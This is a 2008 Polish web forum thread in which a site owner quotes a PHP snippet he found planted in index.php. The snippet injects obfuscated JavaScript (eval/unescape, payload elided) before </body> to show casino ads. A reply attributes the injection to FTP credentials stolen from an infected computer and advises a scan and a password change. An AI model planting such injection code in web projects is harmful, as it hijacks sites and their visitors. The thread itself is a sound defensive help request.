Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 17 Pomógł: 0 Dołączył: 9.03.2006 Ostrzeżenie: (0%)
|
Witajcie
Od kilku dni na jednej z moich stron zaczely sie pojawiac reklamy kasyna, po dlugin sledzctwie w index.php na koncu byl dodany kod podmieniajacy stopke <?php function phpfake($buffer) { $Exp='<script language="javascript"> [...] eval(unescape($));document.write($);</sc ript>'; return (ereg_replace("</body>", "$Exp</body>", $buffer)); } ?> usunalem i nie ma reklam. Ale problem pozostaje. W jaki sposob moglo sie to tam znalesc ? pliki nie sa edytowane z poziomu www, wlamanie na serwer czy moze przez php ? spotkaliscie sie kiedys z czym takim ? Adres strony: http://husariaszczecin.pl Wlamanie przez komentarze ? |
|
|
|
![]() |
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 1 387 Pomógł: 273 Dołączył: 18.02.2008 Ostrzeżenie: (0%)
|
Jest to prawdopodobnie włamanie na serwer poprzez FTP z hasłem ściągniętym z Twojego zainfekowanego komputera lub innego, w którym uzyskiwałeś dostęp poprzez FTP do strony.
- Przeskanuj swój komputer i inne komputery które uzyskiwały dostęp do strony przez FTP - Zmień hasło do FTP Ktoś miał podobny problem, przeczytaj: http://blog.brodowski.net.pl/2008/04/14/go...pieczna-strona/ |
|
|
|
spidero wlamanie ? 10.07.2008, 14:39:59
webdicepl Proszę o dodanie bbcode. 10.07.2008, 14:42:27
spidero dzieki piekne, to samo zasugerowal operator z home... 10.07.2008, 14:59:20 ![]() ![]() |
|
Aktualny czas: 31.12.2025 - 12:19 |